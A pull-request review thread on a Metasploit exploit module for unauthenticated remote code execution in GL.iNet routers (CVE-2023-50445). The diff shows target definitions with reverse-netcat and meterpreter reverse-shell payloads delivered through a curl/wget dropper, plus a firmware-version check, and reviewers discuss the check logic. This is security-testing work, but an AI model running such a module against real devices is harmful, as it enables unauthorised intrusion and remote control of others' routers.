modules/exploits/linux/http/glinet_unauth_rce_cve_2023_50445.rb

```diff
@@ -0,0 +1,312 @@
+          ['URL', 'https://attackerkb.com/topics/LdqSuqHKOj/cve-2023-50919'],
+          ['URL', 'https://libdzonerzy.so/articles/from-zero-to-botnet-glinet.html'],
+          ['URL', 'https://github.com/gl-inet/CVE-issues/blob/main/4.0.0/Using%20Shell%20Metacharacter%20Injection%20via%20API.md']
+        ],
+        'DisclosureDate' => '2023-12-10',
+        'Platform' => ['unix', 'linux'],
+        'Arch' => [ARCH_CMD, ARCH_MIPSLE, ARCH_MIPSBE, ARCH_ARMLE, ARCH_AARCH64],
+        'Privileged' => true,
+        'Targets' => [
+          [
+            'Unix Command',
+            {
+              'Platform' => 'unix',
+              'Arch' => ARCH_CMD,
+              'Type' => :unix_cmd,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'cmd/unix/reverse_netcat'
+              }
+            }
+          ],
+          [
+            'Linux Dropper',
+            {
+              'Platform' => 'linux',
+              'Arch' => [ARCH_MIPSLE, ARCH_MIPSBE, ARCH_ARMLE, ARCH_AARCH64],
+              'Type' => :linux_dropper,
+              'CmdStagerFlavor' => ['curl', 'wget', 'echo', 'printf', 'bourne'],
+              'Linemax' => 900,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'linux/mipsbe/meterpreter_reverse_tcp'
+              }
+            }
+          ]
+        ],
+        'DefaultTarget' => 0,
+        'DefaultOptions' => {
+          'RPORT' => 443,
+          'SSL' => true
+        },
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
+        }
+      )
+    )
+    register_options([
+      OptString.new('SID', [false, 'Session ID'])
+    ])
+  end
+
+  def vuln_version?
+    @glinet = { 'model' => nil, 'firmware' => nil, 'arch' => nil }
+    # check first with version 4.x api call
+    post_data = {
+      jsonrpc: '2.0',
+      id: rand(1000..9999),
+      method: 'call',
+      params: [
+        '',
+        'ui',
+        'check_initialized',
+        {}
+      ]
+    }.to_json
+
+    res = send_request_cgi({
+      'method' => 'POST',
+      'ctype' => 'text/json',
+      'uri' => normalize_uri(target_uri.path, 'rpc'),
+      'data' => post_data.to_s
+    })
+    if res && res.code == 200 && res.body.include?('result')
+      res_json = res.get_json_document
+      unless res_json.blank?
+        @glinet['model'] = res_json['result']['model']
+        @glinet['firmware'] = res_json['result']['firmware_version']
+      end
+    else
+      # check with version 3.x api call. These versions are NOT vulnerable
+      res = send_request_cgi({
+        'method' => 'GET',
+        'ctype' => 'application/x-www-form-urlencoded',
+        'uri' => normalize_uri(target_uri.path, 'cgi-bin', 'api', 'router', 'hello')
+      })
+      if res && res.code == 200 && res.body.include?('model') && res.body.include?('version')
```

Comment:
I haven't tested the version 3.x API though I'm wondering if this change might make sense. 
```suggestion
      if res && res.code == 200 && res.body.include?('version')
```
If the target responds to the version 4.x API call, the `@glinet['firmware']` gets set even if `res_json['result']['model']` is not present in the response, which was the case in my testing. 

If the target responds to the version 3.x API call `@glinet['firmware']` will not get set if `res.body.include?('model')` is false in which case `CheckCode::Unknown` will always be returned by the check method. Though if `@glinet['firmware']` gets set there is a possibility of returning `CheckCode::Detected` if the version is greater or equal than 4.0.0.

Reply:
@jheysel-r7 on your first point. Indeed `res_json['result']['model']` is not present in the response, but this is truly an exception and somehow caused by the emulation which is not perfect. This will not happen with the real hardware.
Second point on 3.x API call. There will be never a situation that a firmware version of `4.0.0` or higher will be returned using the 3.x API call. It will only return 3.x firmware versions and both firmware and model information will be in the response (see https://dev.gl-inet.com/router-3.x-api/#api-Router-GetRouterHello).

Reply:
@h00die-gr3y, sounds good to me, thank you for taking the time to explain!